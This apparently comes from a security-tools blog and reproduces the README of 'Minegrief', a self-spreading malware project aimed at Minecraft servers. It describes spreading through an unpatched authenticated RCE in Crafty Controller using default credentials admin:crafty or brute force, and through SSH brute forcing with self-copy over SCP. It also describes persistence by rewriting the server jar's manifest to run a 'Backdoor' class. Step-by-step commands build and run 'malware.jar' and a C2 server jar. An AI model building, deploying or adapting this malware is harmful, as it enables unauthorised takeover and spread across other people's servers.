Minegrief : Unpacking A Crafty Minecraft Malware

Self-spreading to other Minecraft servers using an extendable, module-based lateral movement system.

Crafty Controller Auth’d RCE – undisclosed, unpatched, intentional(?) Auth’d RCE in Crafty Controller, a panel for Minecraft server management. Check for default creds of admin:crafty or brute force.
SSH brute forcing – Classic SSH brute forcing, Minegrief will copy itself over SCP and execute itself if a login is successful

Persistence/stealth by “infecting” the Minecraft server jar file via manifest entry point modification

Notes

Lateral movement modules require minegriefagent to be built as a jar file, as modules will copy itself over in a jar to spread.

To Build The Agent Jarfile

Download jsch to the root directory of the repository

wget https://repo1.maven.org/maven2/com/github/mwiede/jsch/0.2.17/jsch-0.2.17.jar
unzip jsch-0.2.17.jar

Run this from the root of the repository

rm -rf build-manual
mkdir build-manual
find agent -name '*.java' > sources.txt
<JAVA 1.8 DIR>/bin/javac -d build-manual @sources.txt
cp -r com/jcraft build-manual/com
echo 'Manifest-Version: 1.0\nMain-Class: net.minecraft.bundler.Backdoor\nBundler-Format: 1.0' > manifest.txt
<JAVA 1.8 DIR>/bin/jar cvfm malware.jar manifest.txt -C build-manual .

Run it

<JAVA 1.8 DIR>/bin/java -jar malware.jar

To Build The Server Jarfile

Run this from the root of the repository

rm -rf build-manual
mkdir build-manual
find server -name '*.java' > sources.txt
<JAVA 1.8 DIR>/bin/javac -d build-manual @sources.txt
echo 'Manifest-Version: 1.0\nMain-Class: com.chebuya.minegriefserver.Main\nBundler-Format: 1.0' > manifest.txt
<JAVA 1.8 DIR>/bin/jar cvfm c2-server.jar manifest.txt -C build-manual .

Varshini

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.